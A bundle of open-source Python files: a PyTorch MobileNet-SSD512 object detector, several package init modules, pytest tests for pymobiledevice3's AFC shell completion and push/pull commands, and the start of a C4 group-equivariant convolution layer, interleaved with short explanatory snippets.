                nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4, padding=1),
                nn.ReLU()
            )
        ])

    def forward(self, x):
        hs = []
        for i, l in enumerate(self.model):
            x = l(x)
            if i == 9 or i == 14:
                hs.append(x)
        for l in self.extras:
            x = l(x)
            hs.append(x)
        return hs
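The `conv_dw` block is MobileNet's depthwise-separable replacement for a dense 3x3 convolution: a per-channel 3x3 depthwise filter followed by a 1x1 pointwise projection. Ignoring the BatchNorm parameters, the weight-count savings can be checked with plain arithmetic (the helper names below are made up for the example):

```python
def conv3x3_params(inp, oup):
    # Standard 3x3 convolution, no bias (as in conv_bn above).
    return 3 * 3 * inp * oup

def conv_dw_params(inp, oup):
    # Depthwise 3x3 (one 3x3 filter per input channel) + 1x1 pointwise projection.
    return 3 * 3 * inp + inp * oup

dense = conv3x3_params(512, 512)  # 2359296 weights
dw = conv_dw_params(512, 512)     # 266752 weights
print(dense, dw, round(dense / dw, 1))  # ~8.8x fewer parameters
```

The same ratio roughly carries over to multiply-accumulate counts, which is why the extractor can afford fifteen such blocks.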
# def SeperableConv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0):
# """Replace Conv2d with a depthwise Conv2d and Pointwise Conv2d.
# """
# return Sequential(
# Conv2d(in_channels=in_channels, out_channels=in_channels, kernel_size=kernel_size,
# groups=in_channels, stride=stride, padding=padding),
# ReLU(),
# Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1),
# )
# class MobileNetExtractorLite512(nn.Module):
# def __init__(self):
# super(MobileNetExtractor512, self).__init__()
# def conv_bn(inp, oup, stride):
# return nn.Sequential(
# nn.Conv2d(inp, oup, 3, stride, 1, bias=False),
# nn.BatchNorm2d(oup),
# nn.ReLU(inplace=True)
# )
# def conv_dw(inp, oup, stride):
# return nn.Sequential(
# nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False),
# nn.BatchNorm2d(inp),
# nn.ReLU(inplace=True),
# nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
# nn.BatchNorm2d(oup),
# nn.ReLU(inplace=True),
# )
# self.model = nn.Sequential(
# conv_bn(3, 64, 2),
# conv_dw(64, 64, 1),
# conv_dw(64, 128, 2),
# conv_dw(128, 128, 1),
# conv_dw(128, 256, 2),
# conv_dw(256, 256, 1),
# conv_dw(256, 256, 1),
# conv_dw(256, 512, 1),
# conv_dw(512, 512, 1),
# conv_dw(512, 512, 1),
# conv_dw(512, 512, 2),
# conv_dw(512, 512, 1),
# conv_dw(512, 512, 1),
# conv_dw(512, 1024, 1),
# conv_dw(1024, 1024, 1),
# )
# self.extras = nn.ModuleList([
# nn.Sequential(
# nn.Conv2d(in_channels=1024, out_channels=256, kernel_size=1),
# nn.ReLU(),
# SeperableConv2d(in_channels=256, out_channels=512, kernel_size=3, stride=2, padding=1),
# ),
# nn.Sequential(
# nn.Conv2d(in_channels=512, out_channels=128, kernel_size=1),
# nn.ReLU(),
# SeperableConv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
# ),
# nn.Sequential(
# nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
# nn.ReLU(),
# SeperableConv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
# ),
# nn.Sequential(
# nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
# nn.ReLU(),
# SeperableConv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
# ),
# nn.Sequential(
# nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
# nn.ReLU(),
# SeperableConv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
# )
# ])
# def forward(self, x):
# hs = []
# for i,l in enumerate(self.model):
# x = l(x)
# if i == 9 or i == 14:
# hs.append(x)
# for l in self.extras:
# x = l(x)
# hs.append(x)
# return hs
class MobileSSD512(nn.Module):
    steps = (8, 16, 32, 64, 128, 256, 512)
    box_sizes = (35.84, 76.8, 153.6, 230.4, 307.2, 384.0, 460.8, 537.6)  # default bounding box sizes for each feature map.
    aspect_ratios = ((2,), (2, 3), (2, 3), (2, 3), (2, 3), (2,), (2,))
    fm_sizes = (64, 32, 16, 8, 4, 2, 1)

    def __init__(self, num_classes, cfg):
        super(MobileSSD512, self).__init__()
        self.num_classes = num_classes
        self.num_anchors = (4, 6, 6, 6, 6, 4, 4)
        self.in_channels = (512, 1024, 512, 256, 256, 256, 256)
        self.extractor = MobileNetExtractor512()
        priorbox = SphPriorBox(cfg)
        with torch.no_grad():
            self.priors = priorbox.forward().cuda()
        self.softmax = nn.Softmax(dim=1).cuda()
        self.loc_layers = nn.ModuleList()
        self.cls_layers = nn.ModuleList()
        for i in range(len(self.in_channels)):
            self.loc_layers += [nn.Conv2d(self.in_channels[i], self.num_anchors[i] * 4, kernel_size=3, padding=1)]
            self.cls_layers += [nn.Conv2d(self.in_channels[i], self.num_anchors[i] * self.num_classes, kernel_size=3, padding=1)]
        self._initialize_weights()

    def forward(self, x):
        loc_preds = []
        cls_preds = []
        xs = self.extractor(x)
        for i, x in enumerate(xs):
            loc_pred = self.loc_layers[i](x)
            loc_pred = loc_pred.permute(0, 2, 3, 1).contiguous()
            loc_preds.append(loc_pred.view(loc_pred.size(0), -1, 4))
            cls_pred = self.cls_layers[i](x)
            cls_pred = cls_pred.permute(0, 2, 3, 1).contiguous()
            cls_preds.append(cls_pred.view(cls_pred.size(0), -1, self.num_classes))
        loc_preds = torch.cat(loc_preds, 1)
        cls_preds = torch.cat(cls_preds, 1)
        return loc_preds, cls_preds, self.priors

    def _initialize_weights(self):
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
                if m.bias is not None:
                    m.bias.data.zero_()
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
            elif isinstance(m, nn.Linear):
                n = m.weight.size(1)
                m.weight.data.normal_(0, 0.01)
                m.bias.data.zero_()
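The second dimension of `loc_preds`/`cls_preds` equals the total number of prior boxes across all seven heads. Assuming square feature maps of the sizes listed in `fm_sizes` (the `test()` below actually feeds a 512x1024 input, which would scale these counts accordingly), the count works out as:

```python
fm_sizes = (64, 32, 16, 8, 4, 2, 1)
num_anchors = (4, 6, 6, 6, 6, 4, 4)

# Each feature-map cell emits num_anchors[i] prior boxes.
total = sum(f * f * a for f, a in zip(fm_sizes, num_anchors))
print(total)  # 24564
```

This is the value the `SphPriorBox` output and the concatenated head outputs must agree on for the loss computation to line up.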
# class MobileSSDLite512(nn.Module):
# steps = (8, 16, 32, 64, 128, 256, 512)
# box_sizes = (35.84, 76.8, 153.6, 230.4, 307.2, 384.0, 460.8, 537.6) # default bounding box sizes for each feature map.
# aspect_ratios = ((2,), (2, 3), (2, 3), (2, 3), (2, 3), (2,), (2,))
# fm_sizes = (64, 32, 16, 8, 4, 2, 1)
# def __init__(self, num_classes, cfg):
# super(MobileSSDLite512, self).__init__()
# self.num_classes = num_classes
# self.num_anchors = (4, 6, 6, 6, 6, 4, 4)
# self.in_channels = (512, 1024, 512, 256, 256, 256, 256)
# self.extractor = MobileNetExtractorLite512()
# priorbox = SphPriorBox(cfg)
# with torch.no_grad():
# self.priors = priorbox.forward().cuda()
# self.softmax = nn.Softmax(dim=1).cuda()
# self.loc_layers = nn.ModuleList()
# self.cls_layers = nn.ModuleList()
# for i in range(len(self.in_channels)):
# self.loc_layers += [nn.Conv2d(self.in_channels[i], self.num_anchors[i]*4, kernel_size=3, padding=1)]
# self.cls_layers += [nn.Conv2d(self.in_channels[i], self.num_anchors[i]*self.num_classes, kernel_size=3, padding=1)]
# self._initialize_weights()
# def forward(self, x):
# loc_preds = []
# cls_preds = []
# xs = self.extractor(x)
# for i, x in enumerate(xs):
# loc_pred = self.loc_layers[i](x)
# loc_pred = loc_pred.permute(0,2,3,1).contiguous()
# loc_preds.append(loc_pred.view(loc_pred.size(0),-1,4))
# cls_pred = self.cls_layers[i](x)
# cls_pred = cls_pred.permute(0,2,3,1).contiguous()
# cls_preds.append(cls_pred.view(cls_pred.size(0),-1,self.num_classes))
# loc_preds = torch.cat(loc_preds, 1)
# cls_preds = torch.cat(cls_preds, 1)
# return loc_preds, cls_preds, self.priors
# def _initialize_weights(self):
# for m in self.modules():
# if isinstance(m, nn.Conv2d):
# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
# m.weight.data.normal_(0, math.sqrt(2. / n))
# if m.bias is not None:
# m.bias.data.zero_()
# elif isinstance(m, nn.BatchNorm2d):
# m.weight.data.fill_(1)
# m.bias.data.zero_()
# elif isinstance(m, nn.Linear):
# n = m.weight.size(1)
# m.weight.data.normal_(0, 0.01)
# m.bias.data.zero_()
def test():
    net = MobileSSD512(25, v3)
    loc_preds, cls_preds, priors = net(Variable(torch.randn(16, 3, 512, 1024)))
    print(loc_preds.size(), cls_preds.size(), priors.size())


if __name__ == '__main__':
    test()
#--------------------------------------#
# File: astruct/__init__.py
# Repo: misterfifths/nis-mods (license: MIT)
#--------------------------------------#
# pyright: reportUnusedImport=none
from . import type_hints
from .typed_struct import typed_struct
#--------------------------------------#
# File: ariadne_jwt/__init__.py
# Repo: abaumg/ariadne-jwt (license: MIT)
#--------------------------------------#
from .mutations import (resolve_verify, resolve_refresh, resolve_revoke, resolve_token_auth, jwt_schema)
from .scalar import GenericScalar
__all__ = ['resolve_verify', 'resolve_refresh', 'resolve_revoke', 'resolve_token_auth', 'jwt_schema', 'GenericScalar', ]
#--------------------------------------#
# File: pyspj/__init__.py
# Repo: HansBug/pyspj (license: Apache-2.0)
#--------------------------------------#
from .entry import *
from .models import *
#--------------------------------------#
# File: acq4/devices/DAQGeneric/__init__.py
# Repo: aleonlein/acq4 (license: MIT)
#--------------------------------------#
from __future__ import print_function
from .DAQGeneric import *
#--------------------------------------#
# File: face_utils/cropping/__init__.py
# Repo: HermasTV/mmfu (license: MIT)
#--------------------------------------#
from face_utils.cropping import cropping
#--------------------------------------#
# File: tests/services/test_afc_shell.py
# Repo: iOSForensics/pymobiledevice3 (license: MIT)
#--------------------------------------#
from pathlib import Path
from unittest import mock
import pytest
from cmd2_ext_test import ExternalTestMixin
from cmd2 import CommandResult
import gnureadline
from pymobiledevice3.services.afc import AfcShell
SINGLE_PARAM_COMMANDS = ['edit', 'cd', 'walk', 'cat', 'rm', 'head', 'hexdump', 'stat']
class AfcShellTester(ExternalTestMixin, AfcShell):
    def __init__(self, *args, **kwargs):
        # gotta have this or neither the plugin nor cmd2 will initialize
        super().__init__(*args, **kwargs)


@pytest.fixture(scope='function')
def afc_shell(lockdown):
    app = AfcShellTester(lockdown)
    try:
        yield app
    finally:
        app.afc.service.close()
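The `afc_shell` fixture relies on pytest treating everything after `yield` as teardown that runs even when the test body fails. That setup/teardown ordering can be sketched with stdlib `contextlib` alone (the `fake_shell` name is invented for the example):

```python
from contextlib import contextmanager

events = []

@contextmanager
def fake_shell():
    events.append('setup')  # runs before the test body
    try:
        yield 'app'
    finally:
        events.append('teardown')  # runs even if the body raises

try:
    with fake_shell() as app:
        events.append(f'use {app}')
        raise RuntimeError('test failed')
except RuntimeError:
    pass

print(events)  # ['setup', 'use app', 'teardown']
```

pytest's yield fixtures follow the same generator protocol, which is why the `try/finally` above guarantees the AFC service connection is closed after every test.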
def get_completions(line, part, app):
    def get_line():
        return line

    def get_begidx():
        return len(line) - len(part)

    def get_endidx():
        return len(line)

    with mock.patch.object(gnureadline, 'get_line_buffer', get_line):
        with mock.patch.object(gnureadline, 'get_begidx', get_begidx):
            with mock.patch.object(gnureadline, 'get_endidx', get_endidx):
                app.complete(part, 0)
                return app.completion_matches
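`get_completions` works by temporarily swapping out `gnureadline`'s buffer-inspection functions so cmd2's completer sees a fabricated command line. The same `mock.patch.object` pattern can be shown in isolation on a stand-in object (all names below are made up for the example):

```python
from unittest import mock
import types

# A stand-in for a readline-like module.
fakereadline = types.SimpleNamespace(get_line_buffer=lambda: '')

def current_word():
    # Reads whatever the (possibly patched) buffer function returns.
    return fakereadline.get_line_buffer().split()[-1]

with mock.patch.object(fakereadline, 'get_line_buffer', lambda: 'ls DC'):
    assert current_word() == 'DC'

# Outside the context manager the original attribute is restored.
assert fakereadline.get_line_buffer() == ''
```

Because `patch.object` restores the attribute on exit, the three nested patches in `get_completions` leave `gnureadline` untouched once the helper returns.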
@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_completion(command, afc_shell):
    filenames = get_completions(f'{command} D', 'D', afc_shell)
    assert 'DCIM' in filenames
    assert 'Downloads' in filenames
    assert 'Books' not in filenames


@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_completion_empty(command, afc_shell):
    filenames = get_completions(f'{command} ', '', afc_shell)
    assert 'DCIM' in filenames
    assert 'Downloads' in filenames
    assert 'Books' in filenames


@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_completion_with_space(command, afc_shell):
    afc_shell.afc.makedirs('aa bb cc/dd ee ff')
    try:
        assert ['"aa bb cc" '] == get_completions(f'{command} aa ', 'aa ', afc_shell)
        assert ['aa bb cc" '] == get_completions(f'{command} "aa ', 'aa ', afc_shell)
        assert ['"aa bb cc/dd ee ff" '] == get_completions(f'{command} aa bb cc/dd ee', 'aa bb cc/dd ee', afc_shell)
    finally:
        afc_shell.afc.rm('aa bb cc')
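The quoting being asserted above (completions wrapping names that contain spaces) exists because shell-style tokenizers split on unquoted whitespace. Stdlib `shlex` shows why a bare `aa bb cc` must be quoted to survive splitting (cmd2's own parser emits double quotes, while `shlex.quote` would emit single quotes, but the tokenization rule is the same):

```python
import shlex

# Unquoted, the path splits into three separate arguments:
print(shlex.split('cd aa bb cc'))    # ['cd', 'aa', 'bb', 'cc']

# Quoted (as the completer emits it), it stays one argument:
print(shlex.split('cd "aa bb cc"'))  # ['cd', 'aa bb cc']
```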
@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_in_folder_completion(command, afc_shell):
    afc_shell.afc.makedirs('temp1/temp2')
    afc_shell.afc.makedirs('temp1/temp4')
    try:
        assert ['temp1 '] == get_completions(f'{command} temp', 'temp', afc_shell)
        assert ['temp1/temp2', 'temp1/temp4'] == get_completions(f'{command} temp1/', 'temp1/', afc_shell)
        assert ['temp1/temp2', 'temp1/temp4'] == get_completions(f'{command} temp1/temp', 'temp1/temp', afc_shell)
    finally:
        afc_shell.afc.rm('temp1')


@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_completion_after_cd(command, afc_shell):
    afc_shell.afc.makedirs('temp1/temp2')
    afc_shell.afc.makedirs('temp1/temp4')
    afc_shell.app_cmd('cd temp1')
    completions = get_completions(f'{command} temp', 'temp', afc_shell)
    afc_shell.afc.rm('temp1')
    assert ['temp2', 'temp4'] == completions


@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_not_over_completing(command, afc_shell):
    assert not get_completions(f'{command} DCIM ', '', afc_shell)


def test_mv_completion(afc_shell):
    afc_shell.afc.makedirs('temp1')
    afc_shell.afc.set_file_contents('temp1/temp.txt', b'data')
    try:
        assert get_completions('mv temp1/t', 'temp1/t', afc_shell) == ['temp1/temp.txt ']
        assert get_completions('mv temp1/temp.txt tem', 'tem', afc_shell) == ['temp1 ']
    finally:
        afc_shell.afc.rm('temp1')


def test_push_completion(afc_shell, tmp_path: Path):
    (tmp_path / 'temp1.txt').write_text('hey1')
    (tmp_path / 'temp2.txt').write_text('hey2')
    assert get_completions(f'push {tmp_path}', str(tmp_path), afc_shell) == [f'{tmp_path} ']
    assert get_completions(f'push {tmp_path}/', f'{tmp_path}/', afc_shell) == [f'{tmp_path}/temp1.txt',
                                                                               f'{tmp_path}/temp2.txt']
    second_completion = get_completions(f'push {tmp_path} D', 'D', afc_shell)
    assert 'DCIM' in second_completion
    assert 'Downloads' in second_completion
    assert 'Books' not in second_completion


def test_pull_completion(afc_shell, tmp_path: Path):
    completions = get_completions('pull D', 'D', afc_shell)
    assert 'DCIM' in completions
    assert 'Downloads' in completions
    assert 'Books' not in completions
    (tmp_path / 'temp1.txt').write_text('hey1')
    (tmp_path / 'temp2.txt').write_text('hey2')
    assert get_completions(f'pull DCIM {tmp_path}', str(tmp_path), afc_shell) == [f'{tmp_path} ']
    assert get_completions(f'pull DCIM {tmp_path}/', f'{tmp_path}/', afc_shell) == [f'{tmp_path}/temp1.txt',
                                                                                   f'{tmp_path}/temp2.txt']


def test_ls(afc_shell):
    out = afc_shell.app_cmd('ls')
    assert isinstance(out, CommandResult)
    filenames = str(out.stdout).strip().splitlines()
    assert 'DCIM' in filenames
    assert 'Downloads' in filenames
    assert 'Books' in filenames


def test_pull_after_cd_single_file(afc_shell, tmp_path: Path):
    """
    source:
    temp1
    └── temp.txt
    cd temp1
    pull temp.txt target
    target
    └── temp.txt
    """
    file_name = 'temp.txt'
    file_data = b'data'
    afc_shell.afc.makedirs('temp1')
    afc_shell.afc.set_file_contents(f'temp1/{file_name}', file_data)
    out = afc_shell.app_cmd(f'pull {file_name} {tmp_path.absolute()}')
    try:
        assert 'AfcFileNotFoundError' in out.stderr
        afc_shell.app_cmd('cd temp1')
        out = afc_shell.app_cmd(f'pull {file_name} {tmp_path.absolute()}')
        assert not out.stderr
        assert (tmp_path / file_name).read_bytes() == file_data
    finally:
        afc_shell.afc.rm('temp1')
def test_pull_after_cd_single_file_with_prefix(afc_shell, tmp_path: Path):
    """
    source:
    temp1
    └── temp2
        └── temp3
            └── temp.txt
    cd temp1
    pull temp2/temp3/temp.txt target
    target
    └── temp.txt
    """
    file_name = 'temp.txt'
    file_data = b'data'
    afc_shell.afc.makedirs('temp1/temp2/temp3')
    afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/{file_name}', file_data)
    try:
        afc_shell.app_cmd('cd temp1')
        out = afc_shell.app_cmd(f'pull temp2/temp3/{file_name} {tmp_path.absolute()}')
        assert not out.stderr
        assert (tmp_path / file_name).read_bytes() == file_data
    finally:
        afc_shell.afc.rm('temp1')


def test_pull_after_cd_single_file_with_rename(afc_shell, tmp_path: Path):
    """
    source:
    temp1
    └── temp.txt
    cd temp1
    pull temp.txt target/temp1.txt
    target
    └── temp1.txt
    """
    file_name = 'temp.txt'
    file_rename = 'temp1.txt'
    file_data = b'data'
    afc_shell.afc.makedirs('temp1')
    afc_shell.afc.set_file_contents(f'temp1/{file_name}', file_data)
    try:
        afc_shell.app_cmd('cd temp1')
        out = afc_shell.app_cmd(f'pull {file_name} {(tmp_path / file_rename).absolute()}')
        assert not out.stderr
        assert (tmp_path / file_rename).read_bytes() == file_data
    finally:
        afc_shell.afc.rm('temp1')


def test_pull_after_cd_recursive(afc_shell, tmp_path: Path):
    """
    source:
    temp1
    └── temp2
        └── temp3
            ├── temp4
            │   └── temp1.txt
            └── temp.txt
    cd temp1/temp2
    pull temp3 target
    target
    └── temp3
        ├── temp4
        │   └── temp1.txt
        └── temp.txt
    """
    file_name = 'temp.txt'
    file_name1 = 'temp1.txt'
    file_data = b'data'
    file_data1 = b'data1'
    afc_shell.afc.makedirs('temp1/temp2/temp3/temp4')
    afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/{file_name}', file_data)
    afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/temp4/{file_name1}', file_data1)
    try:
        afc_shell.app_cmd('cd temp1/temp2')
        out = afc_shell.app_cmd(f'pull temp3 {tmp_path.absolute()}')
        assert not out.stderr
        assert (tmp_path / 'temp3' / file_name).read_bytes() == file_data
        assert len(list((tmp_path / 'temp3').iterdir())) == 2
        assert (tmp_path / 'temp3' / 'temp4' / file_name1).read_bytes() == file_data1
        assert len(list((tmp_path / 'temp3' / 'temp4').iterdir())) == 1
    finally:
        afc_shell.afc.rm('temp1')


def test_pull_after_cd_recursive_current(afc_shell, tmp_path: Path):
    """
    source:
    temp1
    └── temp2
        └── temp3
            ├── temp4
            │   └── temp1.txt
            └── temp.txt
    cd temp1/temp2/temp3
    pull . target
    target
    ├── temp4
    │   └── temp1.txt
    └── temp.txt
    """
    file_name = 'temp.txt'
    file_name1 = 'temp1.txt'
    file_data = b'data'
    file_data1 = b'data1'
    afc_shell.afc.makedirs('temp1/temp2/temp3/temp4')
    afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/{file_name}', file_data)
    afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/temp4/{file_name1}', file_data1)
    try:
        afc_shell.app_cmd('cd temp1/temp2/temp3')
        out = afc_shell.app_cmd(f'pull . {tmp_path.absolute()}')
        assert not out.stderr
        assert (tmp_path / file_name).read_bytes() == file_data
        assert len(list(tmp_path.iterdir())) == 2
        assert (tmp_path / 'temp4' / file_name1).read_bytes() == file_data1
        assert len(list((tmp_path / 'temp4').iterdir())) == 1
    finally:
        afc_shell.afc.rm('temp1')
def test_pull_after_cd_recursive_with_prefix(afc_shell, tmp_path: Path):
    """
    source:
    temp1
    └── temp2
        └── temp3
            ├── temp4
            │   └── temp1.txt
            └── temp.txt
    cd temp1
    pull temp2/temp3 target
    target
    └── temp3
        ├── temp4
        │   └── temp1.txt
        └── temp.txt
    """
    file_name = 'temp.txt'
    file_name1 = 'temp1.txt'
    file_data = b'data'
    file_data1 = b'data1'
    afc_shell.afc.makedirs('temp1/temp2/temp3/temp4')
    afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/{file_name}', file_data)
    afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/temp4/{file_name1}', file_data1)
    try:
        afc_shell.app_cmd('cd temp1')
        out = afc_shell.app_cmd(f'pull temp2/temp3 {tmp_path.absolute()}')
        assert not out.stderr
        assert (tmp_path / 'temp3' / file_name).read_bytes() == file_data
        assert len(list((tmp_path / 'temp3').iterdir())) == 2
        assert (tmp_path / 'temp3' / 'temp4' / file_name1).read_bytes() == file_data1
        assert len(list((tmp_path / 'temp3' / 'temp4').iterdir())) == 1
    finally:
        afc_shell.afc.rm('temp1')


def test_push_after_cd_single_file_current(afc_shell, tmp_path: Path):
    """
    source:
    temp.txt
    cd target
    push source/temp.txt .
    target
    └── temp.txt
    """
    file_name = 'temp.txt'
    file_data = b'data'
    source_file = (tmp_path / file_name)
    source_file.write_bytes(file_data)
    afc_shell.afc.makedirs('temp1')
    afc_shell.app_cmd('cd temp1')
    try:
        out = afc_shell.app_cmd(f'push {source_file} .')
        assert not out.stderr
        assert afc_shell.afc.get_file_contents(f'temp1/{file_name}') == file_data
    finally:
        afc_shell.afc.rm('temp1')


def test_push_after_cd_single_file_with_prefix(afc_shell, tmp_path: Path):
    """
    source:
    temp.txt
    cd temp1/temp2
    push source/temp.txt temp3/temp.txt
    target
    temp1
    └── temp2
        └── temp3
            └── temp.txt
    """
    file_name = 'temp.txt'
    file_data = b'data'
    source_file = (tmp_path / file_name)
    source_file.write_bytes(file_data)
    afc_shell.afc.makedirs('temp1/temp2/temp3')
    afc_shell.app_cmd('cd temp1/temp2')
    try:
        out = afc_shell.app_cmd(f'push {source_file} temp3/{file_name}')
        assert not out.stderr
        assert afc_shell.afc.get_file_contents(f'temp1/temp2/temp3/{file_name}') == file_data
    finally:
        afc_shell.afc.rm('temp1')


def test_push_after_cd_single_file_with_rename(afc_shell, tmp_path: Path):
    """
    source:
    temp.txt
    cd temp1
    push source/temp.txt temp1.txt
    target
    temp1
    └── temp1.txt
    """
    file_name = 'temp.txt'
    file_rename = 'temp1.txt'
    file_data = b'data'
    source_file = (tmp_path / file_name)
    source_file.write_bytes(file_data)
    afc_shell.afc.makedirs('temp1')
    afc_shell.app_cmd('cd temp1')
    try:
        out = afc_shell.app_cmd(f'push {source_file} {file_rename}')
        assert not out.stderr
        assert afc_shell.afc.get_file_contents(f'temp1/{file_rename}') == file_data
    finally:
        afc_shell.afc.rm('temp1')


def test_push_after_cd_recursive_current(afc_shell, tmp_path: Path):
    """
    source:
    temp2
    └── temp3
        ├── temp4
        │   └── temp1.txt
        └── temp.txt
    mkdir temp1
    cd temp1
    push temp2 .
    target:
    temp1
    └── temp2
        └── temp3
            ├── temp4
            │   └── temp1.txt
            └── temp.txt
    """
    (tmp_path / 'temp2' / 'temp3' / 'temp4').mkdir(parents=True)
    (tmp_path / 'temp2' / 'temp3' / 'temp.txt').write_bytes(b'data')
    (tmp_path / 'temp2' / 'temp3' / 'temp4' / 'temp1.txt').write_bytes(b'data1')
    source_file = tmp_path / 'temp2'
    afc_shell.afc.makedirs('temp1')
    afc_shell.app_cmd('cd temp1')
    try:
        out = afc_shell.app_cmd(f'push {source_file} .')
        assert not out.stderr
        assert afc_shell.afc.get_file_contents('temp1/temp2/temp3/temp.txt') == b'data'
        assert afc_shell.afc.get_file_contents('temp1/temp2/temp3/temp4/temp1.txt') == b'data1'
    finally:
        afc_shell.afc.rm('temp1')


def test_push_after_cd_recursive_with_slash_current(afc_shell, tmp_path: Path):
    """
    source:
    temp2
    └── temp3
        ├── temp4
        │   └── temp1.txt
        └── temp.txt
    mkdir temp1
    cd temp1
    push temp2/ .
    target:
    temp1
    └── temp3
        ├── temp4
        │   └── temp1.txt
        └── temp.txt
    """
    (tmp_path / 'temp2' / 'temp3' / 'temp4').mkdir(parents=True)
    (tmp_path / 'temp2' / 'temp3' / 'temp.txt').write_bytes(b'data')
    (tmp_path / 'temp2' / 'temp3' / 'temp4' / 'temp1.txt').write_bytes(b'data1')
    source_file = tmp_path / 'temp2'
    afc_shell.afc.makedirs('temp1')
    afc_shell.app_cmd('cd temp1')
    try:
        out = afc_shell.app_cmd(f'push {source_file}/ .')
        assert not out.stderr
        assert afc_shell.afc.get_file_contents('temp1/temp3/temp.txt') == b'data'
        assert afc_shell.afc.get_file_contents('temp1/temp3/temp4/temp1.txt') == b'data1'
    finally:
        afc_shell.afc.rm('temp1')


def test_push_after_cd_recursive_with_prefix(afc_shell, tmp_path: Path):
    """
    source:
    temp2
    └── temp3
        ├── temp4
        │   └── temp1.txt
        └── temp.txt
    mkdir temp1/temp1a/temp1b
    cd temp1
    push temp2 temp1a/temp1b
    target:
    temp1
    └── temp1a
        └── temp1b
            └── temp2
                └── temp3
                    ├── temp4
                    │   └── temp1.txt
                    └── temp.txt
    """
    (tmp_path / 'temp2' / 'temp3' / 'temp4').mkdir(parents=True)
    (tmp_path / 'temp2' / 'temp3' / 'temp.txt').write_bytes(b'data')
    (tmp_path / 'temp2' / 'temp3' / 'temp4' / 'temp1.txt').write_bytes(b'data1')
    source_file = tmp_path / 'temp2'
    afc_shell.afc.makedirs('temp1/temp1a/temp1b')
    afc_shell.app_cmd('cd temp1')
    try:
        out = afc_shell.app_cmd(f'push {source_file} temp1a/temp1b')
        assert not out.stderr
        assert afc_shell.afc.get_file_contents('temp1/temp1a/temp1b/temp2/temp3/temp.txt') == b'data'
        assert afc_shell.afc.get_file_contents('temp1/temp1a/temp1b/temp2/temp3/temp4/temp1.txt') == b'data1'
    finally:
        afc_shell.afc.rm('temp1')
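# The `push temp2 .` vs `push temp2/ .` cases above follow the rsync-style
# trailing-slash rule: a bare directory name is copied as itself, while a
# trailing slash copies its contents. A local-only sketch of that rule using
# just the standard library (`push_like` is a hypothetical helper, for
# illustration; the real `push` runs over AFC):

```python
import pathlib
import shutil
import tempfile

def push_like(src: str, dst: pathlib.Path) -> None:
    """Copy `src` into `dst`: 'dir' keeps the directory, 'dir/' copies its contents."""
    src_path = pathlib.Path(src.rstrip('/'))
    target = dst if src.endswith('/') else dst / src_path.name
    shutil.copytree(src_path, target, dirs_exist_ok=True)  # dirs_exist_ok: Python 3.8+

with tempfile.TemporaryDirectory() as d:
    root = pathlib.Path(d)
    (root / 'temp2' / 'temp3').mkdir(parents=True)
    (root / 'temp2' / 'temp3' / 'temp.txt').write_text('data')
    no_slash, slash = root / 'no_slash', root / 'slash'
    no_slash.mkdir()
    slash.mkdir()
    push_like(str(root / 'temp2'), no_slash)     # -> no_slash/temp2/temp3/temp.txt
    push_like(str(root / 'temp2') + '/', slash)  # -> slash/temp3/temp.txt
    no_slash_ok = (no_slash / 'temp2' / 'temp3' / 'temp.txt').is_file()
    slash_ok = (slash / 'temp3' / 'temp.txt').is_file()
```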

# === model/group_op.py (LingshenHe/Efficient-Equivariant-Network, MIT license) ===
import torch.nn as nn
import torch
import math


class C_4_1x1(nn.Module):
    def __init__(self, in_channels, out_channels, stride=1):
        super(C_4_1x1, self).__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        weight = torch.randn(out_channels, in_channels, 4) / math.sqrt(4 * in_channels / 2)
        self.weight = torch.nn.Parameter(weight)
        self.stride = stride
        self.pool = nn.MaxPool2d(2, 2)

    def forward(self, x):
        # Expand the base weight into the full C4 group-convolution kernel:
        # output fiber g uses the input fibers cyclically shifted by g.
        weight = torch.zeros(self.out_channels, 4, self.in_channels, 4).to(x.device)
        weight[:, 0, ...] = self.weight
        weight[:, 1, ...] = self.weight[..., [3, 0, 1, 2]]
        weight[:, 2, ...] = self.weight[..., [2, 3, 0, 1]]
        weight[:, 3, ...] = self.weight[..., [1, 2, 3, 0]]
        x = torch.nn.functional.conv2d(x, weight.reshape(self.out_channels * 4, self.in_channels * 4, 1, 1),
                                       stride=1, padding=0)
        if self.stride != 1:
            x = self.pool(x)
        return x


class C_4_3x3(nn.Module):
    def __init__(self, in_channels, out_channels, bias=False, stride=1):
        super(C_4_3x3, self).__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        weight = torch.randn(out_channels, in_channels, 4, 3, 3) / math.sqrt(4 * in_channels * 9 / 2)
        self.weight = torch.nn.Parameter(weight)
        self.pool = nn.MaxPool2d(2, 2)
        self.stride = stride
        self.bias = None
        if bias:
            self.bias = torch.nn.Parameter(torch.randn(out_channels))

    def forward(self, x):
